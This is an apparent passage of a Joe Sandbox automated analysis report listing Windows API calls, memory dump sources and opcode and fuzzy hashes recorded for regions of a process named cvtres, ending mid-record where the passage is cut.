
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: f528e71f91d4b4dfefba54e9e8b5b1e31d4807164b1e5158db5ffde2df95b663
                                                                          • Instruction ID: a4d329e871288cc83adecf1761c96de9aa9bc611c997646bfde12bf713d87f91
                                                                          • Opcode Fuzzy Hash: f528e71f91d4b4dfefba54e9e8b5b1e31d4807164b1e5158db5ffde2df95b663
                                                                          • Instruction Fuzzy Hash: CC1215B4A04268CFCB649F74D9987ADB7B6BB88305F1086E9D90E93350DB358E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499449012.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_b50000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: j
                                                                          • API String ID: 2994545307-2137352139
                                                                          • Opcode ID: d30679f463e684ba231ec217bbf1c44600f063dad1b4902d32e656cfbe356892
                                                                          • Instruction ID: c8cdcf081d5687e97fcb317563154e3ff33e0fb2e978683bfa40280bb466ca93
                                                                          • Opcode Fuzzy Hash: d30679f463e684ba231ec217bbf1c44600f063dad1b4902d32e656cfbe356892
                                                                          • Instruction Fuzzy Hash: B041BC30A092848FDB09CB74D855BAE7FF1AF86305F1584EAE414EB392DB79C949CB11
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0696954B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: e15302e34aeb546bf676f0bdf4a576104d01e602c3e09c156651f663b4320edf
                                                                          • Instruction ID: 6a3767727194080839c212fbc2ef8e841e30ef59e57c85fac4c10a33f0748bc6
                                                                          • Opcode Fuzzy Hash: e15302e34aeb546bf676f0bdf4a576104d01e602c3e09c156651f663b4320edf
                                                                          • Instruction Fuzzy Hash: 47F10430B043408FCB24EB75E85932D7BA6EF85308F25852DE04A8BB91DF799C05CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0696954B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: f7923cd5aa95b8ec23bc95b0adf9ba8cc2902391c8f9b934b0e61b5510538c8d
                                                                          • Instruction ID: 05442001977b9b218cec378a8b7302e597c7c73692049b14e7ad4b6fb6e88e3a
                                                                          • Opcode Fuzzy Hash: f7923cd5aa95b8ec23bc95b0adf9ba8cc2902391c8f9b934b0e61b5510538c8d
                                                                          • Instruction Fuzzy Hash: 5CF1F430B043408BCB64EB79E95972D7BA6EFC5308F24852DE40A8B795DF799C05CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 5630c97ddcd9b1b4d6f926bd905a5ddc972124f848c91f398cc9de6eb3505966
                                                                          • Instruction ID: 37ba5e37b0060b63bbf965511fbe8c9215be6ef29b91aa0dca8e7fd13d41cddc
                                                                          • Opcode Fuzzy Hash: 5630c97ddcd9b1b4d6f926bd905a5ddc972124f848c91f398cc9de6eb3505966
                                                                          • Instruction Fuzzy Hash: EAB12AB4A00268CFCB649B30D9947ADB7B6BB88305F1085EEDA4E93340DB358D86CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2bab05bcc973441463e921e43a8cadb53b6b1d5cc245cffbc5ded30e628bf38b
                                                                          • Instruction ID: 6cccdf3b971b0e7ce5cab9d63563042f1284d6a8de7025c388494866a3647192
                                                                          • Opcode Fuzzy Hash: 2bab05bcc973441463e921e43a8cadb53b6b1d5cc245cffbc5ded30e628bf38b
                                                                          • Instruction Fuzzy Hash: EB91B530B047408BCB64EB39E55832D7AA7DBC5308F14852DE05B8BB95DF79AC45CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 7f070093d0a8d24eec4e48f6002bb09b262be5f9f23b2775943a5b09b95fb324
                                                                          • Instruction ID: 5ff734de519561141d5b99162e50c76cd834eebedb2dff479f76b332de65e310
                                                                          • Opcode Fuzzy Hash: 7f070093d0a8d24eec4e48f6002bb09b262be5f9f23b2775943a5b09b95fb324
                                                                          • Instruction Fuzzy Hash: 6EB12AB4A00268CFCB249B34D9947ADB7B6BB88305F1085EEDA4E93350DB358D86CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0696954B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 1bf07b05f6410ac426e05edc04a5d25ad792cf37276f2a48f17ef3aa9aa48e5e
                                                                          • Instruction ID: 2e218ef92840b26b680f67ed9aab61bcb3470a5cbbd79bad1d82f7c44562aba9
                                                                          • Opcode Fuzzy Hash: 1bf07b05f6410ac426e05edc04a5d25ad792cf37276f2a48f17ef3aa9aa48e5e
                                                                          • Instruction Fuzzy Hash: 9791E630B047408BCB64AB39E55832D7AA7DFC5308F24852DE05B8BB95DF79AC45CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 00e7278c4c46c031fbb8ddd2e952fbf5391fce9f155ea98de79da999da2a904d
                                                                          • Instruction ID: 0de1276747e75205e35b453729bce34b9641f042ad154999c1cdae722834c4a8
                                                                          • Opcode Fuzzy Hash: 00e7278c4c46c031fbb8ddd2e952fbf5391fce9f155ea98de79da999da2a904d
                                                                          • Instruction Fuzzy Hash: EFA129B4A00268CFCB249B34D9947ADB7B6BB88315F1081EEDA0E93350DB358D86CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 2eb6c08547a41c77dbe94024274003ff5e22f535624d1f8bd9e507be517cef7e
                                                                          • Instruction ID: c2231c4ffd820ec8eb1157c409cb0ef3dfe1975562d04e6ebbcc79058d05dede
                                                                          • Opcode Fuzzy Hash: 2eb6c08547a41c77dbe94024274003ff5e22f535624d1f8bd9e507be517cef7e
                                                                          • Instruction Fuzzy Hash: D6A12AB4A04268CBCB249B34D9947ADB7B6BB88305F1081EEDA0E93350DB358D86CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 038889e3ce5baab115063a942055a38cdebadc46cfbf364fdab9b3a545915cb5
                                                                          • Instruction ID: 1bcd72c1e13d857ff3f9488e02d99b3964147645bf38cf460d25ff24375519ab
                                                                          • Opcode Fuzzy Hash: 038889e3ce5baab115063a942055a38cdebadc46cfbf364fdab9b3a545915cb5
                                                                          • Instruction Fuzzy Hash: 8FA12BB4A04268CBCB249B34D9947ADB7B6BB88305F1081EDDA0E93351DB358D86CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: e5bbe64c470f8d1056662f2fd874d88f9dc3aa1e78a476ef4f35de043ad4c2cb
                                                                          • Instruction ID: 5840ed8769c78436f347499fa572a476eaa817cf90c6e4acc77cd6c8cde40681
                                                                          • Opcode Fuzzy Hash: e5bbe64c470f8d1056662f2fd874d88f9dc3aa1e78a476ef4f35de043ad4c2cb
                                                                          • Instruction Fuzzy Hash: EE912AB4A04268CBCB249B34D9987ADB7B6BB88305F1081EDDA0E93351DB358D86CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText
                                                                          • String ID:
                                                                          • API String ID: 2175133113-0
                                                                          • Opcode ID: 92fc4faf303c98ae032efa3b47e753f1732bc8c9a39cb752bc6f029378bab8da
                                                                          • Instruction ID: 7eb0faed0171ff9dfa7f056842cbd3d6dfd3d4557355b9fedc71fcf05ba31e25
                                                                          • Opcode Fuzzy Hash: 92fc4faf303c98ae032efa3b47e753f1732bc8c9a39cb752bc6f029378bab8da
                                                                          • Instruction Fuzzy Hash: D041F531B083914FDB544776586427E3BAAEF85248F28447AE826CBF95EB78CC0D8751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09ECB21B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 44b3bffacfaeb5834a27382ac6d079ba7a2a1c9102316d82613c6857ee037796
                                                                          • Instruction ID: 6a48653f5499d4c659941ec0d716d4efc0c8937b7e11889cd8686a04e909b6aa
                                                                          • Opcode Fuzzy Hash: 44b3bffacfaeb5834a27382ac6d079ba7a2a1c9102316d82613c6857ee037796
                                                                          • Instruction Fuzzy Hash: C15134B0D002588FDB18CFA9C99ABDDBBB1BF48318F18811EE855AB350D774A845CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09ECB21B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 0489c76b96e955a6e4a2a4a8410ab942819440943771d7e17db1668c8173883d
                                                                          • Instruction ID: b709c169b189a3113f014cec233b6c0b0439a2b236fc7dbeada88c151463305a
                                                                          • Opcode Fuzzy Hash: 0489c76b96e955a6e4a2a4a8410ab942819440943771d7e17db1668c8173883d
                                                                          • Instruction Fuzzy Hash: 065103B4E102588FDB18CFA9D98A79EBBB1BF48318F18811DE855AB350D7749845CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09ECB21B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: e909fb11177e74a394e86b227d31f16155734010339e980fd9325a2af1e09f2c
                                                                          • Instruction ID: 074a2aa7fd6188af9fe3c17768a76942b5dda315a3d15027028245a75f2ce0e3
                                                                          • Opcode Fuzzy Hash: e909fb11177e74a394e86b227d31f16155734010339e980fd9325a2af1e09f2c
                                                                          • Instruction Fuzzy Hash: F45125B0D002588FDB18CFA9C98A7DDBBB1BF48314F18811DE855AB350D774A845CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00B5F039
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499449012.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_b50000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID:
                                                                          • API String ID: 3660427363-0
                                                                          • Opcode ID: bf665ed2f2dc22241d116a177d77644beeec6673f00e2a12e630b91cb8da6a3b
                                                                          • Instruction ID: b32f03a792df38e480fb1f905ad8d964be27375b5e058daaae04677cff270591
                                                                          • Opcode Fuzzy Hash: bf665ed2f2dc22241d116a177d77644beeec6673f00e2a12e630b91cb8da6a3b
                                                                          • Instruction Fuzzy Hash: 315149B5E012589FDB20CFA9C485BDEBBF5AF48304F1980AAE818AB351D7749949CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069652A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 2861316239d536d770a5357ed046b95a45bf5deacf2647241a2056ad015e67bd
                                                                          • Instruction ID: 8909afbde462108c7e8dcf3fe2518519d1e1fdc85603ecc8b577cf33aaf50557
                                                                          • Opcode Fuzzy Hash: 2861316239d536d770a5357ed046b95a45bf5deacf2647241a2056ad015e67bd
                                                                          • Instruction Fuzzy Hash: 2351D4B5D103499FDF14CFA9C884ADEBFB5BF48314F64812AE419AB210D7759885CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069652A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: ba439cdf1d782aae024cfb11f1810acb10a81624b9a4ff6b23b775521a7c66c5
                                                                          • Instruction ID: c635bbb09710dfb2a33388037951e22efaed5bcf4db612710db14b02c84bc8b3
                                                                          • Opcode Fuzzy Hash: ba439cdf1d782aae024cfb11f1810acb10a81624b9a4ff6b23b775521a7c66c5
                                                                          • Instruction Fuzzy Hash: F541D1B1D003489FDB14CF9AC884ADEBBB5BF48314F64812AE819AB210D7749885CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00B5ED7C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499449012.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_b50000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: aea49e2afbd6bce5cb9ade04c5c3eb0ade447792b61e071109ce72a82e88da90
                                                                          • Instruction ID: 1784a1d05e2e31a3f8884b08d72de4985d5c619f63b880ff9ecd0127cefbd6ce
                                                                          • Opcode Fuzzy Hash: aea49e2afbd6bce5cb9ade04c5c3eb0ade447792b61e071109ce72a82e88da90
                                                                          • Instruction Fuzzy Hash: 8C4157B5D042488FDB14CFA9C444B8EBBF1AF48304F2881AAE818AB341D7749949CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 06967D01
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          • Opcode ID: 596966aaf3deada164168ac9a953630f87290e832abe74c6e2c3b52f07dee374
                                                                          • Instruction ID: 18c49b6291c056e59b928af365060190cc844c7ce6a40e78f5c062ac3cea8304
                                                                          • Opcode Fuzzy Hash: 596966aaf3deada164168ac9a953630f87290e832abe74c6e2c3b52f07dee374
                                                                          • Instruction Fuzzy Hash: A1414BB5900309DFDB54CF99C448AAABBF5FF88318F24C859E419AB721D734A841CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00B5F039
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499449012.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_b50000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID:
                                                                          • API String ID: 3660427363-0
                                                                          • Opcode ID: 580b964eade37501b7fcd1bd7b3b281102941cb35f17c0613b749079f6031bca
                                                                          • Instruction ID: c24f925b89536419ec12ab7057f7fac66cd47ad25f49cd32dd6fb4336ab137f7
                                                                          • Opcode Fuzzy Hash: 580b964eade37501b7fcd1bd7b3b281102941cb35f17c0613b749079f6031bca
                                                                          • Instruction Fuzzy Hash: BD3100B1D002589FCB20CF99C884A9EFBF5FF48314F5881AAE819AB350D7749949CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 36bcdd3a1ac4f21188b1627ea06d1fe62fc682540b982e6d9e8198505ef7375b
                                                                          • Instruction ID: 463765c6d9f76053c5d17d8c3fc09b4b6012ee522a442dc3287682baf7165886
                                                                          • Opcode Fuzzy Hash: 36bcdd3a1ac4f21188b1627ea06d1fe62fc682540b982e6d9e8198505ef7375b
                                                                          • Instruction Fuzzy Hash: 813112B4D003588FDB14CFA9C5867DEBBB1EB08318F14A52EE855A7250D7749886CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: de6bdc4e3c0bdf8b79da21fe88dd8b7900c6d328273cf5dff870487ce09bf861
                                                                          • Instruction ID: e5bcd72cedbcef5978299ce55df5cb76df872446fbb0fd17777a21187458eeed
                                                                          • Opcode Fuzzy Hash: de6bdc4e3c0bdf8b79da21fe88dd8b7900c6d328273cf5dff870487ce09bf861
                                                                          • Instruction Fuzzy Hash: 163102B4D003598FDB14CFA9C9857DEBBB1AB08318F14A52DE855A7380D7749886CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00B5ED7C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499449012.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_b50000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: 29220e9156944dbb4b7f6020057cdb9aacc094cf5e02b26f32f5bee711dec406
                                                                          • Instruction ID: 5b330d4c9a1629efcb09f3c5b47428020bbfaff26caae6a6f253e68a665967c4
                                                                          • Opcode Fuzzy Hash: 29220e9156944dbb4b7f6020057cdb9aacc094cf5e02b26f32f5bee711dec406
                                                                          • Instruction Fuzzy Hash: 6F3102B1D002488FDB14CF99C584B8EFBF5AF48314F2885AAE819AB341D7759989CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06966DFF
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 379357f23d74427d3fbb8cdf08a2d4fe7abaf9c4f56a9a002fc58bcf9c94cc2a
                                                                          • Instruction ID: 05e6f3a735e78780f9f194280105ef633eaa2a01a3942d71b3a9d2e562d46173
                                                                          • Opcode Fuzzy Hash: 379357f23d74427d3fbb8cdf08a2d4fe7abaf9c4f56a9a002fc58bcf9c94cc2a
                                                                          • Instruction Fuzzy Hash: CE21E4B5D003589FDB10CFA9D884AEEBBF4EB48324F14851AE814A7710D374A954CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06966DFF
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: d8a847dfded27aaee7e97c1e9d4d373e52aa93c0a7a31fdacba36b4e693993bf
                                                                          • Instruction ID: ccc3d137cb0819612eba1af4491bb0a6e1b676a1138714bb28db3e4af7398596
                                                                          • Opcode Fuzzy Hash: d8a847dfded27aaee7e97c1e9d4d373e52aa93c0a7a31fdacba36b4e693993bf
                                                                          • Instruction Fuzzy Hash: FC21C4B5D003589FDB10CF9AD884ADEBBF8EB48324F14841AE914A7710D375A954CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 0696BE72
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID:
                                                                          • API String ID: 2118026453-0
                                                                          • Opcode ID: 7889f904bea772e4c84b4fb2b5f3d16dbf60db4a86d117b0765c485553192290
                                                                          • Instruction ID: b992256e8d12ad4f1764bac26500a46cae5dba25944c600440546dd1f2812d3b
                                                                          • Opcode Fuzzy Hash: 7889f904bea772e4c84b4fb2b5f3d16dbf60db4a86d117b0765c485553192290
                                                                          • Instruction Fuzzy Hash: 7721BB719013448FCB51DFA9C8093EEBFF4EB06324F2484AAE445E7A02D3381458CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 06964216
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 5eac4c9643e96c4cf28e02bc5afac3093f4c359795c1d2adb1e2a1c069b5a4e7
                                                                          • Instruction ID: 027e1e6cd56991e06f7f3f5bccdb2a4582d9ebb5a5742e9c15eb0eac49e224e1
